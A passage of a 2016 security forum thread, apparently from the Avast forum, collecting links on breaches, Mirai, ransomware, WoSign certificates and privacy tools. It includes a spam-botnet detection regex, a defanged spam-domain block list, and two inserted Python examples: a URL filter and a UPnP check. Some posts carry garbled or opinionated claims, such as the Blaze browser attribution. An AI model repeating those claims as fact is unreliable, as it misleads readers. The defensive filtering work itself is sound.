as the creator of the aforementioned list, Willem de Groot, is also owner of this firm/hosting service,
Byte B.V. in the Netherlands. So his intentions with the list may differ from our intentions with it.
Just wanted to remind you of this situation, as it only seems fair to do so.
Notice polonus is a 100% purely unbiased & independent avast support forum volunteer website security specialist,
and I have no interest in this list other than for research purposes.
Seems only 176 webshops are really malicious as such.
Damian
-
@Asyn,
New link where the list resides: https://github.com/gwillem/ecommerce-malware-collection/tree/master/js
Hi pal, new (updated) list here: https://gitlab.com/gwillem/public-snippets/snippets/28813
Cheers,
Asyn
-
Thanks for that one, Asyn. Bookmarked. We're even now. ;)
Would be great to go over that list with some specific scans: http://www.domxssscanner.com/ &
scan at: https://observatory.mozilla.org/
and then put the suspicious code through an unpacker for errors (bugs and insecurity).
Fact is that loads and loads of websites, especially the smaller ones, but not necessarily so,
have sloppy IT management (update/patch management etc.),
and are therefore insecure and open to abuse/infection.
A lot of those on the Willem de G. list also come blocked with firehol: https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_webserver.netset
Have a nice day, ye all,
polonus (volunteer website security analyst and website error-hunter)
-
WordPress sites hacked via new Marketplace plug-in zero-day:
http://labs.sucuri.net/?note=2016-10-17
Obfuscated backdoor code detected....
polonus
-
Report: the anatomy of tech support scams
https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2016/10/report-the-anatomy-of-tech-support-scams/
pdf report
https://www.malwarebytes.com/pdf/white-papers/AnatomyTechSupportScams.pdf?utm_source=blog&utm_medium=social
-
Cybercriminal skimmers find creative solution: credit card data hidden inside image:
https://blog.sucuri.net/2016/10/magento-credit-card-swiper-exports-image.html
Scan your webshop that has Magento here to be alerted to insecurity: magereport.com/scan/?s=
We see that the so-called Willem de G. list made some researchers look a bit sharper for e-commerce site's insecurity.
All reported to Google Safe Browsing that cooperates firmly with Sucuri's.
polonus (volunteer website security analyst and website error-hunter)
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
WTF >:(!!! For one of my uni papers, my institute uses weebly as a source for giving us (students) lecture notes, notices, timetable, etc. I will pass this info to my uni IT support and let them know. Thanks Asyn for posting this
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
Interesting when WOT doesn't trust/like leakedsource.com.
One thing for sure when I come across sites like this there is absolutely no way I would check user name and passwords. As soon as you do that you have pretty much compromised your information and can't/shouldn't use that data again.
Who would trust that the data wouldn't be harvested, certainly not me and I'm a trusting sort NOT.
I won't even use sites to check the strength of my passwords, for the very same reasons.
-
Hi DavidR,
Striking again that a Russian source seems to come with a bad web reputation,
lots of that demonizing going on lately.
The leakedsource dot com organization is into data harvesting, so it sits on big pile of cloud data.
At the moment for whatever reason there is a concerted action going on to make Russia look like the evil empire of cyberwarfare?
In this case: JSC DBA RU-CENTER, privacy protection service.
Comodo Certification - PositiveSSL Multi-Domain,Domain Control Validate seems OK.
What is CloudFlare's role in all this.
The bad side of it all is that CloudFlare seems indifferent to what they have in that cloud traffic they are facilitating.
The good, the bad and the ugly as long as it brings them big profits.
Big data cloud security is bad.
As the majority of big enterprises do not have protection implemented as it should be.
This will not be the last of such big data-breaches, where and when we may find them.
polonus
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
WTF >:(!!! For one of my uni papers, my institute uses weebly as a source for giving us (students) lecture notes, notices, timetable, etc. I will pass this info to my uni IT support and let them know. Thanks Asyn for posting this
You're welcome. :)
-
Unprotected IoT devices killed the US Internet for hours
http://www.bitdefender.com/box/mirai-IOT-security-alert.html
-
Locky Adds Support for a New "S**T" Extension
Security researcher MalwareHunterTeam tells Softpedia that the infamous Locky ransomware has returned today with a new spam campaign that's spreading a new version of the ransomware.
http://news.softpedia.com/news/locky-adds-support-for-a-new-s-t-extension-509588.shtml
-
Warnings are being given out about a new spam botnet.
Important is the advice that shortened URLs in an e-mail should always be frowned upon as suspicious.
Do not click such links.
Here is the information link given on a Dutch news forum; use Google Translate to be able to read about this new spam botnet:
https://www.security.nl/posting/490176/Nieuw+spam+botnet%3F
Be aware of the obfuscated 146&........ ; look out for patterns like e.g. 146&AGTfVq or 146&cc4by etc. in the URL address link.
This could create a handle for blocking this smut-spam
with domain names found to be like:
-hookupclub4[.]com
-flirthookup5[.]com
-flirthookup6[.]com
-flirthookup4[.]com
-claimyourprize2[.]com
-claimyourprize1[.]com
-Info credits here go to : SecGuru_OTX & NSG
polonus
-
Tens of millions of websites at risk in latest mega breach
https://www.leakedsource.com/blog/weebly/
WTF >:(!!! For one of my uni papers, my institute uses weebly as a source for giving us (students) lecture notes, notices, timetable, etc. I will pass this info to my uni IT support and let them know. Thanks Asyn for posting this
You're welcome. :)
@Asyn: It's all good. The IT department at my uni, they knew about this problem and had already taken precautions. Thanks again :)
-
Trying to halt Mirai through a security hole: https://www.invincealabs.com/blog/2016/10/killing-mirai/
link author = Scott Tenaglia.
pol
-
Effective regular expression to be used against new spam botnet:
/[a-z]+\.php\?[a-z]\=146\&[\w]+\=[\w]+\&J9p\=[\w]{3}\&/
Spambot linked to SEO Spam and social media abuse, see https://www.mywot.com/en/scorecard/urlrate.net?utm_source=addon&utm_content=popup
The important Joomla update seems almost too late for mentioned website, re: code error: undefined function window.addEvent -> htxp://tivaen.com/templates/ZAjax_Temp/js/roksortable.js
info credits security.nl anonymous posts 25-10-2016, 01:05 & Yesterday, 21:28
Remarkable is that people who have ISP mail accounts with good and decent working spam filters might not see it
or may get it only as junk mail ready to be deleted. I for instance have not seen these mails with obfuscated shortened url link spam.
pol
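As an added example (not code from either spam-botnet post), here is a small Python filter that applies the regex exactly as quoted above to mail-gateway log lines and, in the same pass, checks the host against the defanged domain list from the earlier post; the log lines and their query strings are constructed for the demo.

```python
import re

# Added example, not from the posts above. The regex is the one quoted in the post,
# copied verbatim with its PCRE "/.../" delimiters removed; the domains are the ones
# listed in the earlier post, given there in defanged "[.]" form.
SPAMBOT_URL_RE = re.compile(r"[a-z]+\.php\?[a-z]\=146\&[\w]+\=[\w]+\&J9p\=[\w]{3}\&")

DEFANGED_DOMAINS = (
    "hookupclub4[.]com", "flirthookup5[.]com", "flirthookup6[.]com",
    "flirthookup4[.]com", "claimyourprize2[.]com", "claimyourprize1[.]com",
)
BLOCKED_DOMAINS = {d.replace("[.]", ".").lower() for d in DEFANGED_DOMAINS}

# Generic URL extractor: host (up to the next "/" or whitespace) and optional path+query.
URL_RE = re.compile(r"https?://([^/\s]+)(/\S*)?", re.IGNORECASE)


def host_is_blocked(host):
    """Exact match or subdomain of a listed domain (www.claimyourprize1.com counts)."""
    host = host.lower().rsplit(":", 1)[0]  # drop an explicit port if present
    return host in BLOCKED_DOMAINS or any(host.endswith("." + d) for d in BLOCKED_DOMAINS)


def classify_url(url):
    """Return the rules a single URL trips, in order: 'blocked-domain', '146-query-pattern'.

    An empty list means neither rule matched. The query-pattern regex is applied to the
    path+query exactly as the post wrote it (case-sensitive), so only the host is lowercased."""
    m = URL_RE.match(url)
    if not m:
        return []
    host, path = m.group(1), m.group(2) or ""
    reasons = []
    if host_is_blocked(host):
        reasons.append("blocked-domain")
    if SPAMBOT_URL_RE.search(path):
        reasons.append("146-query-pattern")
    return reasons


def scan_log(lines):
    """Run classify_url over every URL found in the given log lines.

    Returns a list of (line_number, url, reasons) for URLs that trip at least one rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in URL_RE.finditer(line):
            reasons = classify_url(m.group(0))
            if reasons:
                hits.append((n, m.group(0), reasons))
    return hits


# Constructed mail-gateway style log lines (not real traffic); the query strings reuse
# the "146&AGTfVq" / "146&cc4by" shapes the post mentions.
SAMPLE_LOG = [
    "2016-10-25 01:05:12 from=sender@example.net url=http://flirthookup5.com/go.php?a=146&AGTfVq=ZZ9&J9p=k2p&u=1",
    "2016-10-25 01:05:40 from=newsletter@example.com url=https://forum.avast.com/index.php?topic=52250",
    "2016-10-25 01:06:03 from=sender@example.net url=http://example.org/track.php?c=146&cc4by=Q1w&J9p=xyz&",
    "2016-10-25 01:06:15 from=sender@example.net url=https://www.claimyourprize1.com/",
]

if __name__ == "__main__":
    for line_no, url, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {url}  ->  {', '.join(reasons)}")
```

Lines 1, 3 and 4 of the sample are flagged (line 1 by both rules), line 2 is clean; the regex is case-sensitive as written, so an upper-case path would slip past it unless you lower-case the path first.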
-
Inside the Gootkit C&C server
https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/
-
The Super-Dangerous Rex Botnet Has Only Around 150 Bots
http://news.softpedia.com/news/the-super-dangerous-rex-botnet-has-only-around-150-bots-509768.shtml
-
AtomBombing: A Code Injection that Bypasses Current Security Solutions
http://blog.ensilo.com/atombombing-a-code-injection-that-bypasses-current-security-solutions
-
Grand scale attacks on outdated Joomla almost a certainty, according to Sucuri's:
https://blog.sucuri.net/2016/10/joomla-mass-exploits-privilege-vulnerability.html
This is so for those who haven't found this Joomla update icon yet:
https://docs.joomla.org/Where_is_the_auto_update_for_Joomla%3F
polonus
P.S. How to block malicious account creation for vuln. Joomla: https://github.com/fcoulter/accountblocker
-
The Internet of Things Ecosystem is Broken. How Do We Fix It?
http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/
-
The Internet of Things Ecosystem is Broken. How Do We Fix It?
http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/
I think that when the IoT (idea) came into being there was little or no thought given to security.
There is no way I would give internet access to a bloody fridge, etc. I have a so called Smart TV (and that is over 7 years old) and there is absolutely no way I would hook it up to the internet.
-
The Internet of Things Ecosystem is Broken. How Do We Fix It?
http://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/
I think that when the IoT (idea) came into being there was little or no thought given to security.
There is no way I would give internet access to a bloody fridge, etc. I have a so called Smart TV (and that is over 7 years old) and there is absolutely no way I would hook it up to the internet.
I have a chrome device hooked into one TV and enjoy some of the smart things available on the new "smart TV".
Different strokes for different folks. :)
-
I have my TV and Blu-ray player online so I get software updates, plus Apple TV and a cable TV box to receive all features like Netflix and movie rental
-
Adblock the NSA
https://www.nsaneforums.com/topic/279916-ublockadblock-filters-for-known-exploit-servers/
-
Some things you can do to secure your IoT devices at home.
First and foremost use Avast solutions to protect your Wifi.
I do and I haven't regretted that decision since. Would not use my Android without it.
1. Do not take IoT devices to your workplace, for instance your Bluetooth music watch.
2. Create a separate guest network for IoT devices on your wifi home network.
2a. Check using Wireless Network Watcher for instance to see what's on there.
3. Only plug those devices into the network that you cannot do without.
4. Update, upgrade and patch the firmware of all IoT devices.
5. Disable UPnP, so your devices are not exposed on the Interwebs.
5a. Check for this using the Shodan search engine for instance, or dork searches.
6. Alter the default passwords. Pick good secure passwords and hand a different one to each and every device.
7. Always be wary of cloud services and establish the security thereof. Use secure connections.
8. Keep your "landline" open in any case of a major emergency. Never trust anything outside your network.
9. Disable wifi and bluetooth services whenever there is no need for them.
Then these services should be off.
polonus
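As an added example for step 5 of the checklist (not code from the post or from any of the tools it names), a Python LAN-side check that sends the standard SSDP M-SEARCH and lists which devices answer, flagging a router that still advertises the UPnP Internet Gateway Device (port-mapping) service; the sample reply is constructed, not captured from a real device.

```python
import socket

# Added example, not code from the post or from Wireless Network Watcher/Shodan: a LAN-side
# check for step 5 (UPnP). It multicasts the standard SSDP M-SEARCH and reports the devices
# that answer, flagging routers that expose the UPnP Internet Gateway Device (IGD) service,
# which is the one that opens ports on request.
SSDP_GROUP = "239.255.255.250"
SSDP_PORT = 1900
IGD_MARKERS = ("InternetGatewayDevice", "WANIPConnection", "WANPPPConnection")


def build_msearch(search_target="ssdp:all", mx=2):
    """Build the SSDP M-SEARCH datagram that UPnP devices answer with their LOCATION/USN."""
    request = (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_GROUP}:{SSDP_PORT}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {search_target}\r\n"
        "\r\n"
    )
    return request.encode("ascii")


def parse_ssdp_response(raw):
    """Parse one SSDP reply into a dict of upper-cased header names -> values.

    Returns None for anything that is not an 'HTTP/1.1 200 OK' reply (NOTIFY
    announcements and stray datagrams are ignored)."""
    text = raw.decode("utf-8", errors="replace")
    lines = text.split("\r\n")
    if not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def is_internet_gateway(headers):
    """True if the reply advertises the UPnP IGD/WAN service, i.e. a router that will
    map ports for any LAN client that asks; that is what 'disable UPnP' is about."""
    fields = (headers.get("ST", ""), headers.get("USN", ""))
    return any(marker in f for marker in IGD_MARKERS for f in fields)


def discover_upnp(timeout=3.0):
    """Send M-SEARCH on the local network and collect replies, keyed by USN.

    Each entry records the replying IP, LOCATION (device description URL),
    SERVER banner and whether it looks like an Internet Gateway Device."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.settimeout(timeout)
    found = {}
    try:
        sock.sendto(build_msearch(), (SSDP_GROUP, SSDP_PORT))
        while True:
            data, (ip, _port) = sock.recvfrom(65535)
            headers = parse_ssdp_response(data)
            if headers is None:
                continue
            usn = headers.get("USN") or f"{ip}/{headers.get('LOCATION', '')}"
            found.setdefault(usn, {
                "ip": ip,
                "location": headers.get("LOCATION", ""),
                "server": headers.get("SERVER", ""),
                "igd": is_internet_gateway(headers),
            })
    except socket.timeout:
        pass  # no more replies within the window
    finally:
        sock.close()
    return found


# Constructed sample reply (not captured from a real device; 192.0.2.1 is a documentation
# address) showing the shape a router with UPnP IGD enabled sends back.
SAMPLE_IGD_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.0.2.1:49152/rootDesc.xml\r\n"
    b"SERVER: Linux/3.x UPnP/1.0 ExampleRouter/1.0\r\n"
    b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000001::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for usn, info in discover_upnp().items():
        kind = "IGD (port mapping exposed)" if info["igd"] else "device"
        print(f"{info['ip']:15} {kind:28} {info['server']}  {info['location']}")
```

Run it from a host on the same wifi; a router line marked IGD means UPnP port mapping is still on and step 5 is not done yet, while a quiet run after disabling it confirms the change.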
-
Disclosing vulnerabilities to protect users
https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
-
Microsoft not happy with Google disclosing major Windows bug - Web giant says no fix or advisory has been issued even though it reported the flaw 10 days ago.
https://www.cnet.com/news/microsoft-unhappy-with-google-disclosing-major-windows-bug-security/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem:+Trending+Content&utm_content=58180fbe89b9830007afc76a&utm_medium=trueAnthem&utm_source=facebook
-
Microsoft not happy with Google disclosing major Windows bug - Web giant says no fix or advisory has been issued even though it reported the flaw 10 days ago.
https://www.cnet.com/news/microsoft-unhappy-with-google-disclosing-major-windows-bug-security/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem:+Trending+Content&utm_content=58180fbe89b9830007afc76a&utm_medium=trueAnthem&utm_source=facebook
Only affects 32 bit systems.
-
Google, like Mozilla, now no longer trusts WoSign & StartCom certification:
https://security.googleblog.com/2016/10/distrusting-wosign-and-startcom.html
Also read here on certificate transparency: https://www.certificate-transparency.org/what-is-ct
Apart from what we read there, there seems to be more insecurity coming from the WoSign CA site ("SSL证书_HTTPS加密_SSL数字证书 - 沃通CA【官网】", i.e. "SSL certificate, HTTPS encryption, SSL digital certificate - WoSign CA official site").
Only when we check here do we see that the certificate is installed correctly: https://cryptoreport.websecurity.symantec.com/checker/views/certCheck.jsp
Certificate information
This server uses an Extended Validation (EV) certificate. Information about the site owner has been fully validated by WoSign CA Limited to help secure personal and financial information.
Common name: www.wosign.com
SAN: www.wosign.com, wosign.com, xn--buw427e.xn--fiqz9s, xn--buw427e.xn--fiqs8s, xn--buw427e.cn, xn--buw427e.com, wosign.tw, www.wosign.tw, wosign.us, www.wosign.us, wosign.hk, www.wosign.hk, wosign.com.hk, www.wosign.com.hk, wosign.com.cn, www.wosign.com.cn, wosign.cn, www.wosign.cn
Valid from: 2016-Feb-24 07:24:45 GMT
Valid to: 2018-Apr-24 07:24:45 GMT
Certificate status: Valid
Revocation check method: OCSP
Organization: WoSign 沃通电子认证服务有限公司
Organizational unit:
City/locality: 深圳市
State/province: 广东省
Country: CN
Certificate Transparency: Embedded in certificate
Serial number: 28a6d32c2b971b896cd0de9477fd2a06
Algorithm type: SHA256withRSA
Key size: 2048
Certificate chain:
Certification Authority of WoSign (intermediate certificate)
WoSign Class 4 EV Server CA G2 (intermediate certificate)
www.wosign.com (tested certificate)
Server configuration
Host name: 211.151.125.105
Server type: Microsoft-IIS/7.5
IP address: 211.151.125.105
Port number: 443
Protocols enabled: TLS1.2, TLS1.1, TLS1.0
Protocols not enabled: SSLv3, SSLv2
Secure Renegotiation: Enabled
Downgrade attack prevention: Not Enabled
Next Protocol Negotiation: Not Enabled
Session resumption (caching): Enabled
Session resumption (tickets): Not Enabled
Strict Transport Security (HSTS): Not Enabled
SSL/TLS compression: Not Enabled
Heartbeat (extension): Not Enabled
RC4: Not Enabled
OCSP stapling: Enabled
Vulnerabilities checked: Heartbleed, Poodle (TLS), Poodle (SSLv3), FREAK, BEAST, CRIME
Cipher suites enabled:
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000A)
TLS_RSA_WITH_AES_128_CBC_SHA (0x002F)
TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
TLS_RSA_WITH_AES_128_CBC_SHA256 (0x003C)
TLS_RSA_WITH_AES_256_CBC_SHA256 (0x003D)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xC013)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xC014)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xC027)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xC028)
But here is where we see it go wrong: https://asafaweb.com/Scan?Url=https%3A%2F%2Fwosign.com
with a custom errors: Fail, an excessive headers warning and a clickjacking warning.
The F-Status here is not building more confidence either: https://observatory.mozilla.org/analyze.html?host=wosign.com
as is this one here: https://sritest.io/#report/8353f268-5c60-4145-9d50-d22f5ba5f7f2
Retirable jQuery library: -https://wosign.com
Detected libraries:
jquery - 1.11.3 : (active1) -https://wosign.com/JS/jquery-1.11.3.min.js
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
(active) - the library was also found to be active by running code
1 vulnerable library detected
Others could check similarly on StartCom. I doubt the situation is very much different from that at WoSign's.
polonus (volunteer website security analyst and website error-hunter)
-
Digital virus outbreak in British hospitals has serious consequences: http://www.nlg.nhs.uk/
See warning on that page.
polonus
-
Interesting read on how to discriminate between normal enterprise use of TLS and cybercriminal malware use of it:
https://arxiv.org/pdf/1607.01639v1.pdf
Paper presented by Blake Anderson, Subharthi Paul & David McGrew (all Cisco)
Read how specific malware stands out, where/when it is more one-sided, why tor is more of a client used in malware delivery, asymmetrical versus symmetrical use of encryption, prevailing encryption patterns etc.
For the researching minds among us this is yummy yummy stuff.
You should read it and draw conclusions.
polonus (volunteer website security analyst and website error-hunter)
-
Digital virus outbreak in British hospitals has serious consequences: http://www.nlg.nhs.uk/
See warning on that page.
polonus
Well it has been known that you could get an infection when you are in hospital, but I don't think that this virus is what they/you were expecting.
Whilst they don't give any details on the major incident as to why outpatients, operations, etc. would need to be cancelled.
-
New IoT-malware infests 3500 devices within 5 days.
Read: http://blog.malwaremustdie.org/2016/10/mmd-0059-2016-linuxirctelnet-new-ddos.html
Disable telnet to prevent infection.
polonus
-
Disclosing vulnerabilities to protect users
https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html
Our commitment to our customers’ security
https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/
-
Have a vulnerable Joomla controller and want to block malicious account creation:
https://github.com/fcoulter/accountblocker (licensed by fcoulter - credits to Sucuri's Daniel Cid for finding it)
polonus
-
Websites from hosting provider Wix.com vulnerable through customized XSS malware via a DOM XSS hole.:
-https://www.contrastsecurity.com/security-influencers/dom-xss-in-wix.com *
Your avast webshield may alert on that link page *, but there is no real payload there ,
however for security reasons I decided to break the link. Going out there is your own responsibility!
Anyway when we report links it is always a good policy to break 'em.
Opening them later does not demand rocket technology, and visitors are free from accidently clicking such links initially.
polonus (volunteer website security analyst and website error-hunter)
-
Perhaps the most powerful botnet ever seen.
Entire Internet in a country down due to a DDoS attack.
https://medium.com/@networksecurity/shadows-kill-mirai-ddos-botnet-testing-large-scale-attacks-sending-threatening-messages-about-6a61553d1c7#.j0fb8fkiz
-
Hi Eddy,
A real growing threat those new botnets endangering the infrastructure of the Interwebs now. >:(
Akamai will now stop using insecure SHA1 shortly: https://blogs.akamai.com/2016/11/planning-for-the-end-of-2016-a-leap-second-and-the-end-of-support-for-sha-1-tls-certificates.html
Check domains for insecure SHA1 (that should already have been phased out Jan. last) here:
https://shaaaaaaaaaaaaa.com/
Damian aka polonus
-
New Bizarro Sundown Exploit Kit Spreads Locky
http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/
-
Mirai Botnet Strikes Again to Take Liberia Offline
http://www.infosecurity-magazine.com/news/mirai-botnet-strikes-again-to-take/
-
INSIDE THE RIG EXPLOIT KIT
https://threatpost.com/inside-the-rig-exploit-kit/121805/
-
Is it a good idea to let GCHQ tinker with BGP and SS7 protocols and apply changes to get as they say
a better protection against IP spoofing and DDoS attacks at ISPs?
SS7 protocol for instance is holed and often comes not securely implemented, read about that from the mappers here:
http://labs.p1sec.com/2014/12/28/ss7map-country-risk-ratings/
But can we trust British Signal Intelligence, aka GCHQ-fox with our chicken?
They even might be after new ways to privacy leaks, like badly protected: privacyleak aka leak_locationcell, leak_privateinfos, net_homerouting, leak_authvectors, leak_subscriberplan, net_homerouting_defeated_ati, net_homerouting_defeated_psi & leak_location. Info credits for this article go out to: Laurent Ghigonis
Will this not mean more surveillance in the end for end-users under a better controlled undisturbed condition scheme?
Think again....or read: http://securityaffairs.co/wordpress/39409/cyber-crime/ss7-flaw-surveillance.html
polonus
-
Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb16-37.html
-
Microsoft Security Bulletin Summary for November 2016
https://technet.microsoft.com/library/security/ms16-nov
-
Protecting users from repeatedly dangerous sites
https://security.googleblog.com/2016/11/protecting-users-from-repeatedly_8.html
I hope they also will maintain something like a "3 strikes and you are out" policy or..
first offend - 1 month out
second offend - 3 months out
third offend - out for ever
-
Antivirus Fails to Stop Ransomware 100% of the Time
http://www.infosecurity-magazine.com/news/antivirus-fails-to-stop-ransomware/
-
OpenSSL Security Advisory [10 Nov 2016]
https://www.openssl.org/news/secadv/20161110.txt
-
Is facebook rewarding cybercriminals here?:
Facebook buys black market passwords to keep your account safe
https://www.cnet.com/news/facebook-chief-security-officer-alex-stamos-web-summit-lisbon-hackers/
polonus
-
Data breach on 421 million users:
https://www.leakedsource.com/blog/friendfinder
making this the largest hack of 2016.
The password 123456 brought 900.000 hits,
and so is the most popular and most insecure password of the planet. ::)
Your security out of the window before you can count to ten ;D
polonus
-
It's always nice when you see a massive breach like this and know you aren't in any way affected. :)
-
Threats on smartdevices mapped out for you.
'In order to fully address the inherent threats of mobile devices, a wider view of the mobile ecosystem is necessary. This repository contains the Mobile Threat Catalogue, which describes, identifies, and structures the threats posed to mobile information systems. Readers of the catalogue will notice there are gaps; some threats are not tied to a documented source or lack countermeasures, and other threats not identified here may exist. The National Cybersecurity Center of Excellence (NCCoE) seeks comment on current mobile threats addressed in the Catalogue as well as ideas for additional threats to add...........'
See: https://pages.nist.gov/mobile-threat-catalogue/
info link credits go to: cowboysec.
My advice to mitigate would be : https://daplie.github.io/browser-authenticator/ & https://www.authy.com/app/mobile/
polonus
-
700 million mobile phones may have phoned home to Shanghai: http://www.prnewswire.com/news-releases/kryptowire-discovered-mobile-phone-firmware-that-transmitted-personally-identifiable-information-pii-without-user-consent-or-disclosure-300362844.html
pol
P.S. Funny as there is nothing here: http://toolbar.netcraft.com/site_report?url=http://bigdata.adups.com
Just the index default page and this for all the addresses Kryptowire discusses. Just the welcome to nginx/1.8.0. (port 80 (with a 404) and 443 only)
Is this some demonizing?
Certification for adups dot com - Root installed on the server. Global Trust CA & Rapid SSL256 -CA -G3
For best practices, remove the self-signed root from the server.
Registrar - Alibaba Group China aka Bo Zhang Store.
D
-
http://screencast-o-matic.com/screenshots/u/Lh/1479328602176-74351.png
http://blog.pch.com/blog/2013/04/05/5-ways-to-know-if-its-a-publishers-clearing-house-scam/
I just received one of these phone calls here in New Mexico. So the scammers are out there. Don't send any money and,
Sorry you're not a winner. You will be a big loser if you fall for this.
-
Locky Ransomware being Distributed through Fake Flash Player Update Sites
http://www.bleepingcomputer.com/news/security/locky-ransomware-being-distributed-through-fake-flash-player-update-sites/
-
Billion-Dollar Scams: The Numbers Behind Business Email Compromise
http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/billion-dollar-scams-the-numbers-behind-business-email-compromise
-
Why does Ghostery make Google's profiling more profound?
Using the Ghostery extension will enable Google to profile you even better and more uniquely,
combining your use of the extension and other tracking and fingerprinting vectors.
Bad for the over one million users of the extension.
Check your browser here: https://panopticlick.eff.org/
You wanna read on this fingerprinting with Ghostery,
go to : https://blog.securitee.org/?p=277
A better extension to use is Tracker SSL telling you where,
insecure IDs tracking continues on "secure" SSL-websites.
Think that extensions are only tolerated in Google's Webshop,
when they do not interfere with Google's main income flow (ads and data-selling)
Firefox also does not much towards better end-user privacy,
despite of the fact they have all it takes under the hood in about:config.
Could it be they won't lose Google sponsoring their browser?
Check the actual tracking on certain websites here and you might feel shocked about the results:
https://tools.digitalmethods.net/beta/trackerTracker/
polonus
-
Why does Ghostery make Google's profiling more profound?
Using the Ghostery extension will enable Google to profile you even better and more uniquely,
combining your use of the extension and other tracking and fingerprinting vectors.
Bad for the over one million users of the extension.
<snip>
I tried Ghostery a long time ago when it first came out (and I think you were promoting it), I never really liked it as it conflicted with one of my other add-ons. I preferred to stick with my security add-ons NoScript and RequestPolicy. Cookie Monster is another handy add-on to control cookies.
The main issue with some of these so called security add-ons is they require a degree of user management and that puts off many users.
So looks like I dodged that bullet.
-
A lot of ado about losing the last remnants of our privacy.
Two new browsers with privacy at heart launched recently.
(We of course all know and have Avast SafeZone browser on the desktop).
New promising concepts are Firefox Focus versus Blaze.
Although the CEO at Blaze is being criticized for his Christian fundamental constitutional views,
he still is the inventor of Javascript and i.m.h.o. did a fine job on Blaze (Win64).
For Android I like his Blaze LinkBubble app.
The only "?" for such browsers is you cannot choose a privacy friendly search engine,
that forms a good alternative to google,
which search engine again turns the browser in one big ongoing tracking and profiling machine.
With Google it is like the Eagles sang: "You can check in but never leave".
polonus
-
Ask dot com toolbar, long by some considered to be a kind of adware on its own,
now has been hacked by malcreants to spread malware.
Read: https://blog.redcanary.com/ask-partner-network-compromise
polonus
-
WordPress update scheme insecure
Read: http://www.openwall.com/lists/oss-security/2016/11/21/3
Tips for WP admins: https://paragonie.com/blog/2016/10/guide-automatic-security-updates-for-php-developers#elements-automatic-updates
and http://www.openwall.com/lists/oss-security/2016/11/21/7
link info credits: Scott Arciszewski.
Test here: https://hackertarget.com/wordpress-security-scan/
and enabled by Sucuri's: https://wpscan.org/
and personal scan: http://www.scanwp.com/
polonus
-
As more of EU-countries want a grab in the cloud data for surveillance, without even having to put in a Mutual Legal Assistance Treaty request,
it is high time to improve on general cloud protection.
With all the data breaches and the questionable security status of a greater part of the known CDNs, cloud security is at stake.
polonus
-
Some advise that you should switch to SAFE Linux. :o
Maybe not so safe ???
Elegant 0-day unicorn underscores “serious concerns” about Linux security
http://arstechnica.com/security/2016/11/elegant-0day-unicorn-underscores-serious-concerns-about-linux-security/
-
Hi bob3160,
Could you mention anything completely safe or secure in life? ;D
I can not.
polonus
-
Hi bob3160,
Could you mention anything completely safe or secure in life? ;D
I can not.
polonus
"Alice" :)
-
Hi bob3160,
Could you mention anything completely safe or secure in life? ;D
I can not.
polonus
"Alice" :)
Nothing better than a loving spouse. ;)
-
Installing the wrong extension could open your browser up to browser hijacking.
Hotspot Shield Free VPN Proxy, I wonder whether that one is safe?
Google may warn you: https://nakedsecurity.sophos.com/2014/02/06/google-chrome-will-warn-you-when-its-been-hijacked/
polonus
-
Cerber Ransomware 5.0 Released with a Few Changes
http://www.bleepingcomputer.com/news/security/cerber-ransomware-5-0-released-with-a-few-changes/
Hope avast ready to deal with this. ;)
-
Mirai botnet targets Deutsche Telekom routers in global cyberattack
https://www.engadget.com/2016/11/29/mirai-botnet-targets-deutsche-telekom-routers-in-global-cyberatt/
http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/
http://www.infoworld.com/article/3145883/security/the-new-mirai-malware-strain-has-gone-beyond-deutsche-telekom.html
-
0-day exploit in Firefox (Windows)
http://arstechnica.com/security/2016/11/firefox-0day-used-against-tor-users-almost-identical-to-one-fbi-used-in-2013/
Makes you wonder how Mozilla "fixed" it 3 years ago... :-\
-
Hi Eddy,
